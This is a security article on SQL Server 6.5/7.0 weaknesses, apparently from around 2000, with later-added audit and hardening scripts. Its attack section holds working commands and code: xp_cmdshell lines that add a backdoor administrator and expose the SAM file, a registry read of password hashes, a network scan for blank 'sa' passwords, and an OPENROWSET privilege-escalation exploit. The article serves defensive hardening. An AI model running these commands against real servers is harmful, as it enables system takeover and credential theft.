Some security issues with SQL Server


By xundi <Security Focus>
Xundi1@21cn.com
www.xfocus.org

At present there are many ways to break into an NT Server, such as exploiting the vulnerabilities of IIS, but
people tend not to notice that going in through the SQL Server database associated with the NT Server
is also a fairly common means. You can refer to the following news report:
http://www.vnunet.com/News/1110938.
Some of the sites broken into by Herbless, such as the legoland.co.uk site, were compromised via SQL Server,
which gave control over the system and let the attacker damage it. So protecting SQL Server is by no means a
small matter; here I have collected a few of its holes for everyone's reference, hehe.

----------------------------------------------------------------
Let's first take a look at the network protocol libraries (Net-Libraries) supported by SQL Server:

----------------------------------------------------------------
SQL Server Network Protocol Libraries
----------------------------------------------------------------
Protocol library   Possible vulnerabilities                          Encrypted?
----------------------------------------------------------------
Named Pipes        - Communicates over the NT SMB ports (TCP 139,    No
                     UDP 137/138). These can be controlled at the
                     firewall, but if they are freely reachable
                     from the internal network that is still a
                     weakness.
                   - User name, password and data are sent
                     unencrypted; anyone with a sniffer can
                     capture them.
----------------------------------------------------------------
IP Sockets         - Listens on TCP 1433 by default, so a port       No
                     scanner finds it immediately.
                   - Data can be intercepted with a sniffer.
----------------------------------------------------------------
Multi-Protocol     - The client must support NT RPCs, which can      Yes
                     cause problems in mixed environments.           (optional)
                   - Uses a random TCP port by default, but a
                     fixed port can be configured for firewall
                     port mapping (see KB Q164667).
                   - Pay attention to the encryption option: it
                     is not selected by default.
----------------------------------------------------------------
NWLink             - Data can be intercepted with a sniffer.         No
----------------------------------------------------------------
AppleTalk (ADSP)   - Data can be intercepted with a sniffer.         No
----------------------------------------------------------------
Banyan Vines       - Data can be intercepted with a sniffer.         No
----------------------------------------------------------------

The general recommendation is: if you can use Named Pipes with integrated (NT) security, or Multi-Protocol,
use those protocol libraries, and if possible use Multi-Protocol with the encryption option enabled. If you
cannot use either of those, use the IP Sockets protocol but change its default port, and check the system
regularly to make sure no sniffer is running. Also consider putting a Web service or COM component in front
of SQL Server as the business-object layer of the application, and using a secure channel between that middle
tier and SQL Server. A number of third-party products can encrypt this communication.

-----------------------------------------------------------------------
Now let's talk about the security modes of SQL Server and how they work.

The security mode defines how SQL Server authenticates the users who want to use its services. The following
table describes the SQL Server 6.5 security modes and what changed in SQL Server 7.0:

-------------------------------------------------------------------
Security mode      SQL Server 6.5                          Changes in SQL Server 7.0
-------------------------------------------------------------------
Standard mode      - Logins are defined in SQL Server       - A separate standard mode
                     and given a password.                    no longer exists.
                   - SQL Server login accounts are
                     separate from Windows NT accounts.
-------------------------------------------------------------------
Integrated mode    - Uses Windows NT accounts, set up       - Renamed "Windows NT only"
                     through SQL Security Manager.            mode.
                   - Users connect to SQL Server without   - Only available when the
                     a separate login and password.           server runs on Windows NT,
                   - Passwords are never stored in            not on Win9x.
                     applications and never cross the      - NT groups can be mapped
                     network in plaintext.                    directly, which simplifies
                   - SQL Server can use NT's                  management (note the BUILTIN
                     authentication features, such as         group that is created for
                     account expiration.                      the local system).
                   - Requires the Named Pipes or
                     Multi-Protocol library.
-------------------------------------------------------------------
Mixed mode         - Offers the features of both modes    - Renamed "SQL Server and
                     above, and falls back to a standard     Windows NT" mode.
                     login when the client cannot          - Use Windows NT only mode
                     establish a trusted connection.         whenever you can.
-------------------------------------------------------------------

Logging in is only the first step. Once a user has logged in, the user still has to be granted access to each
individual database, and that requires an entry for the user in that database's sysusers table. So, for
safety, be aware of the "guest" account in your databases: a login with no sysusers entry of its own is mapped
to guest, and if you are not careful, guest lets people you never intended into your database.
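As an added example (not part of the original article), here is a T-SQL audit that ties the points above together: the login mode in use, the logins that are still SQL Server standard logins with passwords held by SQL Server, and the databases in which guest still has access. It assumes SQL Server 7.0, where xp_loginconfig, the isnt* columns of syslogins and the undocumented sp_MSforeachdb procedure exist; run it in an isql/osql session as sa.

```sql
-- Added example (not from the original article): audit how this server
-- authenticates logins and where the guest user still grants database access.
-- Assumes SQL Server 7.0: xp_loginconfig, the isnt* columns of syslogins and
-- the undocumented sp_MSforeachdb all exist there.
USE master
GO

-- 1. Current login mode. 'integrated' is the Windows NT only mode recommended
--    above; 'standard' or 'mixed' means SQL Server itself stores and checks
--    passwords for at least some logins.
EXEC xp_loginconfig 'login mode'
GO

-- 2. Logins that are SQL Server standard logins (isntname = 0). These carry a
--    password inside SQL Server, get no NT account policy (expiry, lockout),
--    and are the ones a blank-'sa'-password style attack targets.
SELECT name,
       CASE WHEN password IS NULL THEN 'BLANK' ELSE 'set' END AS password_state,
       sysadmin
FROM   syslogins
WHERE  isntname = 0
ORDER BY sysadmin DESC, password_state, name
GO

-- 3. Databases in which guest still has access. A login with no sysusers entry
--    of its own in a database is mapped to guest there, so every database
--    printed here is reachable by any login that can connect at all.
EXEC sp_MSforeachdb '
    IF EXISTS (SELECT 1 FROM [?].dbo.sysusers
               WHERE name = ''guest'' AND hasdbaccess = 1)
        PRINT ''guest has access in database: ?'''
GO
```

Every login in the second result set that is not an NT account should be reviewed, and every database named in the third set is open to logins you never explicitly granted access. Note that xp_loginconfig is on the optional removal list later in this article, so run the audit before you harden the server.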

For details, you can refer to Microsoft's site:

Http://www.microsoft.com/technet/SQL/Technote/secure.asp


---------------------------------------------------------------------

Some specific security problems with SQL Server:

The "sa" account has an empty password by default, and it is the administrative login of SQL Server's
security model. With it we can call the xp_cmdshell extended stored procedure to run operating-system
commands, for example:

xp_cmdshell "net user testuser Ugothacked /add"
and then:
xp_cmdshell "net localgroup Administrators testuser /add"

This lets an attacker add a local administrator to the Windows NT machine that runs SQL Server, because
xp_cmdshell runs with the privileges of the MSSQLServer service (usually LocalSystem).

Of course, to do this remotely port 1433 generally has to be open, and the attacker connects with an
ordinary SQL Server client such as isql or osql.

Of course you can also use:

xp_cmdshell "rdisk /s-"

which rebuilds the repair information in the \winnt\repair directory without prompting the user, including
a backup of the SAM. Once that SAM backup exists, the attacker can share the directory and reach it over SMB:

xp_cmdshell "net share getsam=c:\winnt\repair"

fetch the file through the share, and then run L0phtCrack on it. If the SMB ports are filtered by a firewall
or closed, the attacker can instead copy the sam._ file into the Web directory and download it with an
anonymous browser; and if there is no IIS, why not use TFTP.

OK, from this compromised SQL Server an attacker can look for other machines inside the network to extend
the gains. The following is an example SQL script that enumerates the other SQL servers on the network and
checks them for an "sa" account with a blank password:

-----------------------------------------------------------------------

-- Create temp table to store enumerated servers
SET NOCOUNT ON

CREATE TABLE #temp (shelldump varchar(255))

-- 'osql -L' lists the SQL servers that answer on the network
INSERT #temp EXEC xp_cmdshell 'osql -L'

DECLARE @current_server varchar(255), @conn_string varchar(255)

DECLARE sql_cursor CURSOR FOR SELECT shelldump FROM #temp

OPEN sql_cursor
FETCH NEXT FROM sql_cursor INTO @current_server

-- Loop through potential targets and check for blank sa passwords.
-- If a target is vulnerable, its version information is displayed.
WHILE @@FETCH_STATUS = 0
BEGIN
    -- xp_cmdshell output contains a 'Servers:' heading and a trailing NULL row; skip both
    IF @current_server IS NOT NULL AND @current_server <> 'Servers:'
    BEGIN
        SELECT @current_server = RTRIM(LTRIM(@current_server))

        -- Try to log in as sa with an empty password and print @@version on success
        SELECT @conn_string = 'exec xp_cmdshell ''osql -S ' + @current_server
                            + ' -U sa -P "" -Q "SELECT @@version"'''

        PRINT 'Attempting connection to server: ' + @current_server
        EXECUTE (@conn_string)
        PRINT '====================================================================='
    END

    FETCH NEXT FROM sql_cursor INTO @current_server
END

-- Clean up
CLOSE sql_cursor
DEALLOCATE sql_cursor
DROP TABLE #temp

----------------------------------------------------------------------

Of course, some people will have removed the xp_cmdshell extended stored procedure. Then we can also use the
following method:

xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'

If the MSSQLServer service runs under the LocalSystem account and SYSKEY is not enabled on the system, the
call above returns the encrypted password data and SIDs stored in the registry.

--------------------------------------------------------------------------

Another hole concerns privilege elevation through ad hoc heterogeneous queries; see Microsoft's description
at: http://www.microsoft.com/technet/security/bulletin/fq00-014.asp

For this vulnerability, the following exploit gains elevated privileges:

SELECT * FROM OPENROWSET('SQLOLEDB', 'Trusted_connection=yes;data source=myserver',
    'SET fmtonly off EXECUTE master..xp_cmdshell "dir c:\"')

The loopback connection is made under the security context of the SQL Server service account rather than
the caller's, so a low-privileged login can run xp_cmdshell this way. Any other command can be substituted
for "dir c:\", as you can imagine.

---------------------------------------------------------------------------

There is also a recent vulnerability, the Extended Stored Procedure Parameter Parsing vulnerability, whose
details are described at this URL:
Http://www.microsoft.com/technet/security/bulletin/ms00-092.asp.

The main problem is the API function srv_paraminfo() provided by the Open Data Services (ODS) library, which
extended stored procedures use to read their parameters. A call of the form

exec <stored procedure name> <parameter 1>, <parameter 2>

for example this one, which lists the directory tree under "C:\Winnt":

exec xp_dirtree 'C:\Winnt'

hands each parameter to the procedure through srv_paraminfo(). But the affected procedures copy the parameter
without checking its length, so passing a sufficiently long string overwrites other data on the stack and
causes a buffer overflow.

The extended stored procedures currently known to be affected are:

1. xp_peekqueue (xpqueue.dll)
   xp_printstatements (xprepl.dll)

   Passing an extremely long string as the first parameter overwrites the return address saved by the
   exception handler.

2. xp_proxiedmetadata (xprepl.dll)

   This procedure takes 4 parameters. Passing an extremely long string as the second parameter overwrites
   the return address saved by the exception handler.

3. xp_setsqlsecurity (xpstar.dll)

   This procedure takes 4 parameters. Passing an extremely long string as the third parameter makes the
   entire SQL Server process terminate immediately.

4. xp_displayparamstmt (xprepl.dll)
   xp_enumresultset (xprepl.dll)
   xp_showcolv (xprepl.dll)
   xp_updatecolvbm (xprepl.dll)

   Passing an extremely long string as the first parameter causes an access violation and overwrites the
   return address saved by the exception handler.

Here is a trick: if you want to know which DLL file an extended stored procedure calls, you can run the
following (in master):

SELECT o.name, c.text
FROM dbo.syscomments c, dbo.sysobjects o
WHERE c.id = o.id AND o.name = 'xp_peekqueue'

This gives you the DLL behind the extended stored procedure, and if Microsoft had no patch you could
temporarily rename that DLL file. Of course, some DLLs serve several extended stored procedures, so you cannot
rename them blindly or the other procedures stop working; use the following query to find out which extended
stored procedures a DLL provides:

SELECT o.name, c.text
FROM dbo.syscomments c, dbo.sysobjects o
WHERE c.id = o.id AND c.text = 'xpqueue.dll'

Fortunately, Microsoft has released a patch, which you can find at the following location, so there is no
need to go hunting for DLL files, hehe:

Http://support.microsoft.com/support/sql/xp_security.asp

This vulnerability was discovered by @stake, which also provides demonstration test code; you can find it here:

Http://www.atstake.com/research/advisories/2000/sqladv2-poc.c
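As an added example extending the two lookup queries above (not code from the original article or from @stake), the following query inventories every extended stored procedure in master, the DLL behind it, whether the public role has been granted EXECUTE on it, and whether it is on the MS00-092 list above. It assumes the SQL Server 7.0 system tables (sysobjects.xtype, sysprotects with action 224 = EXECUTE, protecttype 205 = GRANT, and uid 0 = public).

```sql
-- Added example (not from the original article): inventory every extended
-- stored procedure in master, the DLL it maps to, whether public can execute
-- it, and whether it is one of the MS00-092 procedures listed above.
-- Assumes SQL Server 7.0 system tables.
USE master
GO
SELECT o.name                                            AS procedure_name,
       c.text                                            AS dll,
       CASE WHEN p.id IS NULL THEN 'no' ELSE 'yes' END   AS public_can_execute,
       CASE WHEN o.name IN ('xp_peekqueue', 'xp_printstatements',
                            'xp_proxiedmetadata', 'xp_setsqlsecurity',
                            'xp_displayparamstmt', 'xp_enumresultset',
                            'xp_showcolv', 'xp_updatecolvbm')
            THEN 'MS00-092' ELSE '' END                  AS known_issue
FROM dbo.sysobjects o
JOIN dbo.syscomments c ON c.id = o.id          -- text column holds the DLL name
LEFT JOIN dbo.sysprotects p
       ON p.id = o.id
      AND p.uid = 0                            -- uid 0 is the public role
      AND p.action = 224                       -- 224 = EXECUTE
      AND p.protecttype = 205                  -- 205 = GRANT (206 would be DENY)
WHERE o.xtype = 'X'                            -- 'X' = extended stored procedure
ORDER BY known_issue DESC, o.name
GO
```

A row flagged both 'MS00-092' and public_can_execute = 'yes' can be crashed or overflowed by any login at all, not only by sa, which is what makes the patch urgent; until it is applied, REVOKE EXECUTE ON <procedure> FROM public is a lighter mitigation than renaming the DLL, because sysadmin can still call the procedure.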

--------------------------------------------------------------------------

OK, SQL Server of course has some other, relatively minor vulnerabilities as well, such as the one ISS
discovered: the administrator login information registered in Enterprise Manager is stored in the registry,
and its encryption is simple enough to be recovered easily. For details see:
http://xforce.iss.net/alerts/advise45.php3. Everyone can go looking in other places for more.

---------------------------------------------------------------------

Some security recommendations for SQL Server systems:

-- Make sure the latest security patches are installed:

Windows NT 4.0 - Service Pack 6a

SQL Server 6.5 - Service Pack 5a

SQL Server 7.0 - Service Pack 2 (plus the various hotfixes; check
Http://www.microsoft.com/download)

SQL Server 2000 - hotfix S80233i.exe (Intel)

Of course, everyone should also keep a close eye on Microsoft's security bulletins.

-- Do not use the default port 1433 for IP Sockets; if you use Multi-Protocol, change its port as well.

-- Don't embed the "sa" password in any application, such as VB/Delphi programs or a global.asa file.
"sa" is SQL Server's default administrative login, with permissions comparable to the Administrator
account in Windows NT, and by default its password is blank.

-- Change the passwords of the "sa" and "probe" accounts.

-- Make sure the SQL Server error logs are kept on an NTFS file system.

-- If you don't need xp_cmdshell, do not leave the xp_cmdshell extended stored procedure on the server;
remove it with sp_dropextendedproc. Enter the following in any isql window:

use master
sp_dropextendedproc 'xp_cmdshell'

-- Drop the OLE Automation stored procedures if you do not need them (some features of Enterprise Manager
will then stop working). These procedures are:

sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty,
sp_OAMethod, sp_OASetProperty, sp_OAStop

-- Remove the registry access procedures if you do not need them:

xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumvalues,
xp_regread, xp_regremovemultistring, xp_regwrite

-- Remove other system stored procedures if you think they still pose a threat. Be careful when dropping
these procedures: try it on a test machine first to make sure your system still works normally. They include:

sp_bindsession, sp_cursor, sp_cursorclose, sp_cursorfetch, sp_cursoropen,
sp_cursoroption, sp_getbindtoken, sp_getmbcscharlen, sp_ismbcsleadbyte,
sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod,
sp_OASetProperty, sp_OAStop, sp_replcmds, sp_replcounters, sp_repldone,
sp_replflush, sp_replstatus, sp_repltrans, sp_sdidebug, xp_availablemedia,
xp_cmdshell, xp_deletemail, xp_dirtree, xp_dropwebtask, xp_dsninfo,
xp_enumdsn, xp_enumerrorlogs, xp_enumgroups, xp_enumqueuedtasks,
xp_eventlog, xp_findnextmsg, xp_fixeddrives, xp_getfiledetails,
xp_getnetname, xp_grantlogin, xp_logevent, xp_loginconfig, xp_logininfo,
xp_makewebtask, xp_msver, xp_perfend, xp_perfmonitor, xp_perfsample,
xp_perfstart, xp_readerrorlog, xp_readmail, xp_revokelogin, xp_runwebtask,
xp_schedulersignal, xp_sendmail, xp_servicecontrol, xp_snmp_getstate,
xp_snmp_raisetrap, xp_sprintf, xp_sqlinventory, xp_sqlregister,
xp_sqltrace, xp_sscanf, xp_startmail, xp_stopmail, xp_subdirs,
xp_unc_to_drive

-- Remove the guest user from your databases.
-- Turn off SQL Mail unless you need it, to stop Trojans and the like from being delivered through it.
-- Set up a scheduled task to run the following at regular intervals:

FINDSTR /C:"Login Failed" \mssql7\log\*.*

and redirect the output to a file, or mail it to the administrator's mailbox.

-- Check frequently for accounts with blank passwords:

use master
SELECT name, password
FROM syslogins
WHERE password IS NULL
ORDER BY name

-- Check which stored procedures and extended stored procedures can be executed without "sa" permission
(that is, have been granted to public, uid 0):

use master
SELECT sysobjects.name
FROM sysobjects, sysprotects
WHERE sysprotects.uid = 0
AND xtype IN ('X', 'P')
AND sysobjects.id = sysprotects.id
ORDER BY name


-- Make sure SQL Server's network traffic stays on an isolated network segment.
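To put the recommendations above into practice, here is an added T-SQL script (not from the original article) that revokes guest's database access, strips the public EXECUTE grant from the registry, OLE Automation and file-system procedures listed above instead of dropping them, and drops xp_cmdshell. Revoking from public leaves a procedure usable by sysadmin, so Enterprise Manager and replication keep working, while ordinary logins lose it. It assumes SQL Server 7.0 (sp_MSforeachdb, sp_revokedbaccess, sysusers.hasdbaccess); the set of procedures in #danger is my selection from the lists above and should be adjusted to your own risk assessment, and msdb is skipped on the assumption that SQL Server Agent jobs there rely on guest.

```sql
-- Added example (not from the original article): apply the hardening
-- recommendations above. Assumes SQL Server 7.0.
USE master
GO

-- 1. Guest: revoke database access wherever it can be revoked. guest cannot be
--    removed from master and tempdb; msdb is skipped on the assumption that
--    SQL Server Agent relies on guest there.
EXEC sp_MSforeachdb '
    IF ''?'' NOT IN (''master'', ''tempdb'', ''msdb'')
       AND EXISTS (SELECT 1 FROM [?].dbo.sysusers
                   WHERE name = ''guest'' AND hasdbaccess = 1)
    BEGIN
        EXEC [?].dbo.sp_revokedbaccess ''guest''
        PRINT ''revoked guest in ?''
    END'
GO

-- 2. Dangerous procedures from the lists above: strip the public grant from
--    every one that still exists, instead of dropping it. The selection is an
--    assumption; extend it to match the lists above as you see fit.
CREATE TABLE #danger (name sysname)
INSERT #danger VALUES ('xp_regread')
INSERT #danger VALUES ('xp_regwrite')
INSERT #danger VALUES ('xp_regdeletekey')
INSERT #danger VALUES ('xp_regdeletevalue')
INSERT #danger VALUES ('xp_regenumvalues')
INSERT #danger VALUES ('xp_regaddmultistring')
INSERT #danger VALUES ('xp_regremovemultistring')
INSERT #danger VALUES ('sp_OACreate')
INSERT #danger VALUES ('sp_OADestroy')
INSERT #danger VALUES ('sp_OAGetErrorInfo')
INSERT #danger VALUES ('sp_OAGetProperty')
INSERT #danger VALUES ('sp_OAMethod')
INSERT #danger VALUES ('sp_OASetProperty')
INSERT #danger VALUES ('sp_OAStop')
INSERT #danger VALUES ('xp_dirtree')
INSERT #danger VALUES ('xp_fixeddrives')
INSERT #danger VALUES ('xp_getfiledetails')
INSERT #danger VALUES ('xp_subdirs')
INSERT #danger VALUES ('xp_availablemedia')
INSERT #danger VALUES ('xp_enumerrorlogs')
INSERT #danger VALUES ('xp_readerrorlog')
INSERT #danger VALUES ('xp_servicecontrol')
INSERT #danger VALUES ('xp_makewebtask')
INSERT #danger VALUES ('xp_runwebtask')
INSERT #danger VALUES ('xp_sendmail')

DECLARE @name sysname, @sql varchar(255)
-- Join against sysobjects so REVOKE is only issued for procedures that exist
DECLARE danger_cursor CURSOR FOR
    SELECT d.name
    FROM #danger d
    JOIN dbo.sysobjects o ON o.name = d.name AND o.xtype IN ('X', 'P')
OPEN danger_cursor
FETCH NEXT FROM danger_cursor INTO @name
WHILE @@FETCH_STATUS = 0
BEGIN
    SELECT @sql = 'REVOKE EXECUTE ON ' + @name + ' FROM public'
    EXEC (@sql)
    PRINT @sql
    FETCH NEXT FROM danger_cursor INTO @name
END
CLOSE danger_cursor
DEALLOCATE danger_cursor
DROP TABLE #danger
GO

-- 3. xp_cmdshell: revoking is not enough, since it is the attacker's main tool
--    once any sysadmin login is compromised; drop it as recommended above.
IF EXISTS (SELECT 1 FROM dbo.sysobjects WHERE name = 'xp_cmdshell' AND xtype = 'X')
    EXEC sp_dropextendedproc 'xp_cmdshell'
GO
```

Run it as sa from isql/osql after taking a backup of master, and re-run the two audit queries above afterwards: the blank-password query should still be checked regularly, and the sysprotects query should no longer list any of the procedures in #danger.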

